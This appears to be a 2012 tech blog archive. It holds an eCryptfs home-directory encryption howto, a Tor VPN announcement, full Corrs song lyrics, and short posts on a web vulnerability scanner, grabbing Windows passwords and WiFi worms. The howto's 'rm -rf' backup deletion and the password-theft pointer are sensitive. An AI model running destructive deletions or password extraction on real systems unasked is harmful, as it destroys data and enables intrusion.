Saturday, August 11, 2012

HOWTO : Encrypt the Home Directory in Ubuntu

You may want to encrypt your own home directory, or another user's, if you did not set that up during the Ubuntu installation. The migration must be run from a different account because the home directory being migrated must not be in use, so a temporary administrator account is created first.

Step 1 :

sudo apt-get install ecryptfs-utils

Step 2 :

sudo adduser tempuser
sudo adduser tempuser sudo

(Ubuntu 12.04 grants sudo rights through the sudo group; older releases used the admin group.) Log out and log back in as tempuser.

Step 3 :

sudo ecryptfs-migrate-home -u samiux

Log out and log back in as samiux, but DO NOT reboot first: the first login completes the migration and mounts the encrypted home.

If you are not prompted for the passphrase, enter the following command :

sudo ecryptfs-add-passphrase

Step 4 (Optional) :

You can display the mount passphrase at any time with the following command :

sudo ecryptfs-unwrap-passphrase

Record the passphrase and keep it somewhere safe; it is what you need for manual recovery of the data if the wrapped copy in the home directory is ever lost.

Step 5 (Optional) :

I suggest you to encrypt the swap too.

sudo ecryptfs-setup-swap

Step 6 :

Then, once everything works, delete the backup of the old unencrypted home directory (/home/samiux.XXXXXXXX, with a random suffix) and the temporary user. Plain rm leaves the old plaintext recoverable from the disk until it is overwritten, so wipe the backup (with shred or a similar tool) rather than just delete it if that matters to you :

sudo rm -rf /home/samiux.*
sudo deluser --remove-home tempuser

That's all! See you.

Tuesday, July 31, 2012

Torified Ubuntu VPN Server

Tor gives you anonymity online: it protects your privacy and defends you against network surveillance and traffic analysis.

Setting up Tor is complicated and sometimes you will fail to get it working. The easiest way is to download the Tor Browser, but it has limitations, the main one being that it covers web browsing only.

The drawback of Tor is speed: it is quite slow because the traffic passes through several nodes to hide your IP address and traffic. Your exit IP changes roughly every 10 minutes and is usually not in your home country.

Learn more about Tor.

I created a Torified Ubuntu VPN Server to overcome some of Tor's limitations, except the speed. It is still under heavy development; the final product will be released soon.

Update

NightHawk - Torified Ubuntu VPN Server is released on August 3, 2012. You can download it at official site.

NightHawk in Action



Installation and Configuration



That's all! See you.

Sunday, July 29, 2012

The Corrs - Full acoustic concert




00:23 Only When I sleep
04:55 What Can I do?
09:48 Radio
14:25 Toss The Feathers
17:56 Everybody Hurts
23:50 Dreams
27:48 Runaway
32:40 Forgiven, Not Forgotten
38:00 At Your Side
43:00 Little Wing
48:00 No Frontiers
52:48 Queen of Hollywood
57:40 Old Town
1:01:00 Lough Erin Shore
1:05:38 So Young

The Corrs - What Can I Do





Lyrics

I haven't slept at all in days
It's been so long since we've talked
And I have been here many times
I just don't know what I'm doing wrong

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

There's only so much I can take
And I just got to let it go
And who knows I might feel better
If I don't try and I don't hope

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

No more waiting, no more aching
No more fighting, no more trying

Maybe there's nothing more to say
And in a funny way I'm calm
Because the power is not mine
I'm just gonna let it fly

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

Love me

Saturday, July 28, 2012

VEGA - Web application vulnerability scanner

Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.



That's all! See you.

Get Windows system passwords without hash decryption

Almost all Windows versions are affected. The following video was not made by me; it shows you how.



That's all! See you.

Friday, July 27, 2012

Why you need to learn hacking skills?

System administrators and programmers can be ethical hackers too, not just penetration testers.

Ethical Hackers and Hackers are speaking the same language, using the same tools and playing the same game.

To find out whether something can be stolen, hire a thief to try, not a cop.



That's all! See you.

Wednesday, July 25, 2012

Enterprise WiFi Worms, Backdoors and Botnets for fun & profit

Windows 7 can turn a laptop into a wifi access point (the wireless hosted network feature). Attackers take advantage of it, combined with social engineering, to spread worms and backdoors into your network and build a botnet.

Vivek Ramachandran shows the concept and how it works.



That's all! See you.